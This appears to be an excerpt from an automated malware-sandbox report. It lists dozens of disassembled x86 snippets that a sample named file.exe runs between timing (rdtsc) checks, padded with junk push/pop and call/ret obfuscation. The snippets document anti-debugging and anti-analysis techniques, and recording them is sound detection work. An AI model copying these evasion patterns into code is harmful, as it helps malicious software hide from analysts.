                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41227 second address: A4129B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F0B09070BC8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F0B09070BC8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 and bh, FFFFFFD3h 0x00000045 push 00000000h 0x00000047 mov edi, ecx 0x00000049 xchg eax, esi 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0B09070BD3h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4129B second address: A412D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007F0B08CB6D27h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A403E4 second address: A403E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A403E8 second address: A4048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnp 00007F0B08CB6D20h 0x0000000e jmp 00007F0B08CB6D1Ah 0x00000013 nop 0x00000014 add dword ptr [ebp+122D32A7h], ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jmp 00007F0B08CB6D25h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0B08CB6D18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D0B09h] 0x0000004d mov dword ptr [ebp+122D32A7h], edx 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edx 0x00000058 call 00007F0B08CB6D18h 0x0000005d pop edx 0x0000005e mov dword ptr [esp+04h], edx 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc edx 0x0000006b push edx 0x0000006c ret 0x0000006d pop edx 0x0000006e ret 0x0000006f add dword ptr [ebp+122D1E26h], eax 0x00000075 push ecx 0x00000076 mov dword ptr [ebp+122D20DCh], eax 0x0000007c pop edi 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 push esi 0x00000081 jnc 00007F0B08CB6D16h 0x00000087 pop esi 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4048F second address: A40494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44340 second address: A443C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D336Bh] 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F0B08CB6D18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov bh, dl 0x0000002a movsx edi, bx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F0B08CB6D18h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 add dword ptr [ebp+122D1E26h], eax 0x0000004f jnl 00007F0B08CB6D25h 0x00000055 jmp 00007F0B08CB6D1Fh 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F0B08CB6D20h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43414 second address: A434CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F0B09070BC8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 push edi 0x00000021 jnl 00007F0B09070BCCh 0x00000027 pop edi 0x00000028 ja 00007F0B09070BCFh 0x0000002e push dword ptr fs:[00000000h] 0x00000035 or dword ptr [ebp+122D1E2Ah], ebx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 jmp 00007F0B09070BD5h 0x00000047 call 00007F0B09070BCDh 0x0000004c jmp 00007F0B09070BD1h 0x00000051 pop ebx 0x00000052 mov eax, dword ptr [ebp+122D0F3Dh] 0x00000058 jmp 00007F0B09070BCBh 0x0000005d mov edi, dword ptr [ebp+122D348Eh] 0x00000063 push FFFFFFFFh 0x00000065 or bh, 0000006Bh 0x00000068 mov bl, ch 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F0B09070BCCh 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41429 second address: A41432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A434CB second address: A434D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4674B second address: A46755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B08CB6D16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49685 second address: A496BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B09070BD4h 0x00000011 jmp 00007F0B09070BD7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49C5B second address: A49CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F0B08CB6D18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 or dword ptr [ebp+122D38AAh], edx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0B08CB6D18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 add dword ptr [ebp+122D209Dh], ecx 0x0000004d push 00000000h 0x0000004f jmp 00007F0B08CB6D26h 0x00000054 mov dword ptr [ebp+1244E1ACh], ebx 0x0000005a xchg eax, esi 0x0000005b jnl 00007F0B08CB6D33h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F0B08CB6D21h 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49CEB second address: A49CFC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49F1C second address: A49F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49F21 second address: A49F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51C87 second address: A51C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9498 second address: 9E94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BD4h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0B09070BD0h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51479 second address: A5147D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5147D second address: A51488 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51488 second address: A51492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51492 second address: A514BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCEh 0x00000009 jmp 00007F0B09070BD0h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514BA second address: A514C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007F0B08CB6D16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514C8 second address: A514D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F0B09070BC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514D7 second address: A514DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514DB second address: A51508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0B09070BD1h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5592D second address: A55937 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55937 second address: A55941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE608 second address: 9EE60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE60C second address: 9EE62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0B09070BD2h 0x0000000e pop esi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE62E second address: 9EE632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B566 second address: A5B56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B56A second address: A5B56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B56E second address: A5B579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B6C8 second address: A5B6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D1Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B6DA second address: A5B700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0B09070BD8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B700 second address: A5B706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B706 second address: A5B710 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60031 second address: A6004B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F0B08CB6D1Ch 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6004B second address: A60056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F0B09070BC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60056 second address: A6005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BE41 second address: A2BE47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BE47 second address: A2BE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BE4B second address: A2BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edx, dword ptr [ebp+122D2CECh] 0x00000011 lea eax, dword ptr [ebp+1247DBF5h] 0x00000017 jmp 00007F0B09070BD9h 0x0000001c mov ecx, dword ptr [ebp+122D2A1Ch] 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F0B09070BCCh 0x0000002b jno 00007F0B09070BC6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C8C8 second address: A2C8F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0B08CB6D1Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push ecx 0x0000000f mov ecx, eax 0x00000011 pop ecx 0x00000012 push 00000004h 0x00000014 mov dx, di 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0B08CB6D1Ah 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C8C4 second address: A2C8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CDEB second address: A2CDF5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D180 second address: A2D186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D186 second address: A2D18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F212 second address: A5F22B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B09070BD3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F22B second address: A5F230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F230 second address: A5F250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0B09070BD1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F250 second address: A5F25A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F647 second address: A5F6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F0B09070BD0h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0B09070BCDh 0x00000012 jmp 00007F0B09070BD2h 0x00000017 js 00007F0B09070BC6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F0B09070BD9h 0x00000028 pop ebx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F824 second address: A5F830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F830 second address: A5F836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659CF second address: A659D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659D3 second address: A659D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659D9 second address: A659E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659E2 second address: A65A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F0B09070BD4h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A02 second address: A65A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F0B08CB6D24h 0x0000000e jnc 00007F0B08CB6D16h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0B08CB6D1Ah 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A32 second address: A65A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B09070BCBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A43 second address: A65A4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B08CB6D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A4D second address: A65A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64A14 second address: A64A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64A18 second address: A64A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F0B09070BC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64CF9 second address: A64D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D29h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64E8E second address: A64E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64E94 second address: A64EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F0B08CB6D16h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6502A second address: A6504C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BD9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6504C second address: A65050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65050 second address: A6506B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B09070BD2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6518C second address: A6519E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jl 00007F0B08CB6D18h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6543B second address: A65440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65440 second address: A65447 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A674C3 second address: A674C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B980 second address: A6B984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B984 second address: A6B988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B988 second address: A6B99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0B08CB6D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0B08CB6D1Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD41 second address: A6BD59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD59 second address: A6BD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD5F second address: A6BD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD65 second address: A6BD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0B08CB6D16h 0x0000000a rdtsc
